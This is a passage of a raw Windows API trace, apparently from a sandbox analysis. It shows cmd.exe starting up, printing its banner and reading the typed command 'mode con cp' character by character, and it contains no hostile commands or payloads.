lpcbData=0x26ebf4*=0x1000 | out: lpType=0x26ebf0*=0x4, lpData=0x26ec10*=0x1, lpcbData=0x26ebf4*=0x4) returned 0x0 [0263.432] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ebf0, lpData=0x26ec10, lpcbData=0x26ebf4*=0x1000 | out: lpType=0x26ebf0*=0x0, lpData=0x26ec10*=0x1, lpcbData=0x26ebf4*=0x1000) returned 0x2 [0263.432] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ebf0, lpData=0x26ec10, lpcbData=0x26ebf4*=0x1000 | out: lpType=0x26ebf0*=0x4, lpData=0x26ec10*=0x0, lpcbData=0x26ebf4*=0x4) returned 0x0 [0263.432] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ebf0, lpData=0x26ec10, lpcbData=0x26ebf4*=0x1000 | out: lpType=0x26ebf0*=0x4, lpData=0x26ec10*=0x9, lpcbData=0x26ebf4*=0x4) returned 0x0 [0263.432] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ebf0, lpData=0x26ec10, lpcbData=0x26ebf4*=0x1000 | out: lpType=0x26ebf0*=0x4, lpData=0x26ec10*=0x9, lpcbData=0x26ebf4*=0x4) returned 0x0 [0263.432] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ebf0, lpData=0x26ec10, lpcbData=0x26ebf4*=0x1000 | out: lpType=0x26ebf0*=0x0, lpData=0x26ec10*=0x9, lpcbData=0x26ebf4*=0x1000) returned 0x2 [0263.432] RegCloseKey (hKey=0x44) returned 0x0 [0263.432] time (in: timer=0x0 | out: timer=0x0) returned 0x5d066760 [0263.432] srand (_Seed=0x5d066760) [0263.432] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0263.432] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0263.433] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a19c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0263.433] GetProcessHeap () returned 0x2d0000 [0263.433] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x218) returned 0x2eaae0 [0263.433] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2eaaf0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0263.433] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a18f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0263.433] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a18f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0263.433] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a18f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0263.433] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0263.433] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0263.433] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0263.433] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0263.433] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0263.433] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0263.433] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0263.433] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0263.433] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0263.434] GetProcessHeap () returned 0x2d0000 [0263.434] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e9560 | out: hHeap=0x2d0000) returned 1 [0263.434] GetEnvironmentStringsW () returned 0x2e8aa0* [0263.434] GetProcessHeap () returned 0x2d0000 [0263.434] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xacc) returned 0x2ead00 [0263.434] FreeEnvironmentStringsW (penv=0x2e8aa0) returned 1 [0263.434] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a18f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0263.434] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a18f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0263.434] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0263.434] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0263.434] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0263.434] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0263.434] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0263.434] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0263.434] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0263.434] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0263.434] GetProcessHeap () returned 0x2d0000 [0263.434] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x38) returned 0x2e64d0 [0263.434] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26fa00 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0263.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x26fa00, lpFilePart=0x26f9e0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x26f9e0*="system32") returned 0x13 [0263.434] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0263.434] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x26f710 | out: lpFindFileData=0x26f710*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x59000158, cFileName="Windows", cAlternateFileName="")) returned 0x2eb7e0 [0263.434] FindClose (in: hFindFile=0x2eb7e0 | out: hFindFile=0x2eb7e0) returned 1 [0263.434] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x26f710 | out: lpFindFileData=0x26f710*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb05cc7a0, ftLastAccessTime.dwHighDateTime=0x1d5246c, ftLastWriteTime.dwLowDateTime=0xb05cc7a0, ftLastWriteTime.dwHighDateTime=0x1d5246c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x59000158, cFileName="System32", cAlternateFileName="")) returned 0x2eb7e0 [0263.434] FindClose (in: hFindFile=0x2eb7e0 | out: hFindFile=0x2eb7e0) returned 1 [0263.435] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0263.435] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0263.435] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0263.435] GetProcessHeap () returned 0x2d0000 [0263.435] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ead00 | out: hHeap=0x2d0000) returned 1 [0263.435] GetEnvironmentStringsW () returned 0x2ead00* [0263.435] GetProcessHeap () returned 0x2d0000 [0263.435] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xafc) returned 0x2e8aa0 [0263.435] FreeEnvironmentStringsW (penv=0x2ead00) returned 1 [0263.435] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a19c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0263.435] GetProcessHeap () returned 0x2d0000 [0263.435] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e64d0 | out: hHeap=0x2d0000) returned 1 [0263.435] GetProcessHeap () returned 0x2d0000 [0263.435] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4016) returned 0x2ead00 [0263.435] GetProcessHeap () returned 0x2d0000 [0263.435] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ead00 | out: hHeap=0x2d0000) returned 1 [0263.435] GetConsoleOutputCP () returned 0x1b5 [0263.435] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a19bfe0 | out: lpCPInfo=0x4a19bfe0) returned 1 [0263.435] GetUserDefaultLCID () returned 0x409 [0263.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a197b50, cchData=8 | out: lpLCData=":") returned 2 [0263.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fb10, cchData=128 | out: lpLCData="0") returned 2 [0263.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fb10, cchData=128 | out: lpLCData="0") returned 2 [0263.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fb10, cchData=128 | out: lpLCData="1") returned 2 [0263.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1aa740, cchData=8 | out: lpLCData="/") returned 2 [0263.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1aa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0263.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1aa460, cchData=32 | out: lpLCData="Tue") returned 4 [0263.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1aa420, cchData=32 | out: lpLCData="Wed") returned 4 [0263.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1aa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0263.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1aa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0263.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1aa360, cchData=32 | out: lpLCData="Sat") returned 4 [0263.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1aa700, cchData=32 | out: lpLCData="Sun") returned 4 [0263.436] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a197b40, cchData=8 | out: lpLCData=".") returned 2 [0263.436] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1aa4e0, cchData=8 | out: lpLCData=",") returned 2 [0263.436] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0263.437] GetProcessHeap () returned 0x2d0000 [0263.437] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x20c) returned 0x2e9620 [0263.437] GetConsoleTitleW (in: lpConsoleTitle=0x2e9620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0263.438] _get_osfhandle (_FileHandle=1) returned 0xf4 [0263.438] GetFileType (hFile=0xf4) returned 0x3 [0263.617] BrandingFormatString () returned 0x2e9840 [0263.629] GetVersion () returned 0x1db10106 [0263.629] _vsnwprintf (in: _Buffer=0x26fc80, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x26fc18 | out: _Buffer="6.1.7601") returned 8 [0263.629] _get_osfhandle (_FileHandle=1) returned 0xf4 [0263.629] GetFileType (hFile=0xf4) returned 0x3 [0263.629] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a1a6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0263.630] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a1a6340, nSize=0x2000, Arguments=0x26fc20 | out: lpBuffer="Microsoft Windows [Version 6.1.7601]") returned 0x24 [0263.630] _get_osfhandle (_FileHandle=1) returned 0xf4 [0263.630] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 6.1.7601]", cchWideChar=-1, lpMultiByteStr=0x4a19c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 6.1.7601]", lpUsedDefaultChar=0x0) returned 37 [0263.630] WriteFile (in: hFile=0xf4, lpBuffer=0x4a19c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x26fba8, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesWritten=0x26fba8*=0x24, lpOverlapped=0x0) returned 1 [0263.630] _vsnwprintf (in: _Buffer=0x4a1a6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26fc48 | out: _Buffer="\r\n") returned 2 [0263.630] _get_osfhandle (_FileHandle=1) returned 0xf4 [0263.630] GetFileType (hFile=0xf4) returned 0x3 [0263.630] _get_osfhandle (_FileHandle=1) returned 0xf4 [0263.630] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a19c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0263.630] WriteFile (in: hFile=0xf4, lpBuffer=0x4a19c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26fc18, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesWritten=0x26fc18*=0x2, lpOverlapped=0x0) returned 1 [0263.630] _vsnwprintf (in: _Buffer=0x4a1a6340, _BufferCount=0x1fff, _Format="%s", _ArgList=0x26fc48 | out: _Buffer="Copyright (c) 2009 Microsoft Corporation. All rights reserved.") returned 63 [0263.630] _get_osfhandle (_FileHandle=1) returned 0xf4 [0263.630] GetFileType (hFile=0xf4) returned 0x3 [0263.630] _get_osfhandle (_FileHandle=1) returned 0xf4 [0263.630] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x4a19c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 64 [0263.630] WriteFile (in: hFile=0xf4, lpBuffer=0x4a19c320*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x26fc18, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesWritten=0x26fc18*=0x3f, lpOverlapped=0x0) returned 1 [0263.630] _vsnwprintf (in: _Buffer=0x4a1a6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26fc48 | out: _Buffer="\r\n") returned 2 [0263.630] _get_osfhandle (_FileHandle=1) returned 0xf4 [0263.630] GetFileType (hFile=0xf4) returned 0x3 [0263.630] _get_osfhandle (_FileHandle=1) returned 0xf4 [0263.630] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a19c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0263.630] WriteFile (in: hFile=0xf4, lpBuffer=0x4a19c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26fc18, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesWritten=0x26fc18*=0x2, lpOverlapped=0x0) returned 1 [0263.631] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76ee0000 [0263.631] GetProcAddress (hModule=0x76ee0000, lpProcName="CopyFileExW") returned 0x76ef23d0 [0263.631] GetProcAddress (hModule=0x76ee0000, lpProcName="IsDebuggerPresent") returned 0x76ee8290 [0263.631] GetProcAddress (hModule=0x76ee0000, lpProcName="SetConsoleInputExeNameW") returned 0x76ef17e0 [0263.631] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.631] GetFileType (hFile=0xe8) returned 0x3 [0263.631] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0263.631] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x26fa70 | out: TokenHandle=0x26fa70*=0x0) returned 0xc000007c [0263.631] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x26fa70 | out: TokenHandle=0x26fa70*=0x50) returned 0x0 [0263.631] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x12, TokenInformation=0x26fa80, TokenInformationLength=0x4, ReturnLength=0x26fa88 | out: TokenInformation=0x26fa80, ReturnLength=0x26fa88) returned 0x0 [0263.632] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x1a, TokenInformation=0x26fa88, TokenInformationLength=0x4, ReturnLength=0x26fa80 | out: TokenInformation=0x26fa88, ReturnLength=0x26fa80) returned 0x0 [0263.632] NtClose (Handle=0x50) returned 0x0 [0263.632] GetProcessHeap () returned 0x2d0000 [0263.632] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eaae0 | out: hHeap=0x2d0000) returned 1 [0263.633] _vsnwprintf (in: _Buffer=0x4a1a6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f788 | out: _Buffer="\r\n") returned 2 [0263.633] _get_osfhandle (_FileHandle=1) returned 0xf4 [0263.633] GetFileType (hFile=0xf4) returned 0x3 [0263.633] _get_osfhandle (_FileHandle=1) returned 0xf4 [0263.633] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a19c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0263.633] WriteFile (in: hFile=0xf4, lpBuffer=0x4a19c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26f758, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesWritten=0x26f758*=0x2, lpOverlapped=0x0) returned 1 [0263.633] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a18f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0263.633] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a19c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0263.633] _vsnwprintf (in: _Buffer=0x4a18eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x26f798 | out: _Buffer="C:\\Windows\\system32") returned 19 [0263.633] _vsnwprintf (in: _Buffer=0x4a18eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x26f798 | out: _Buffer=">") returned 1 [0263.633] _get_osfhandle (_FileHandle=1) returned 0xf4 [0263.633] GetFileType (hFile=0xf4) returned 0x3 [0263.633] _get_osfhandle (_FileHandle=1) returned 0xf4 [0263.633] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4a19c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0263.633] WriteFile (in: hFile=0xf4, lpBuffer=0x4a19c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x26f788, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesWritten=0x26f788*=0x14, lpOverlapped=0x0) returned 1 [0263.634] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.634] GetFileType (hFile=0xe8) returned 0x3 [0263.634] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.634] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.634] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.634] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e320, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0263.634] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.634] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.634] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.634] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e322, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0263.634] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.634] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.634] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.634] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e324, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0263.634] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.634] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.634] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.634] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e326, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0263.634] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.634] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.634] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.634] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e328, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0263.634] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.634] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.634] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.634] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e32a, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0263.634] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.634] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.634] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.634] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e32c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0263.634] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.635] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.635] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.635] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e32e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0263.635] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.635] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.635] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.635] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e330, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0263.635] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.635] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.635] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.635] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e332, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0263.635] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.635] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.635] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.635] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e334, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0263.635] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.635] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.635] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, 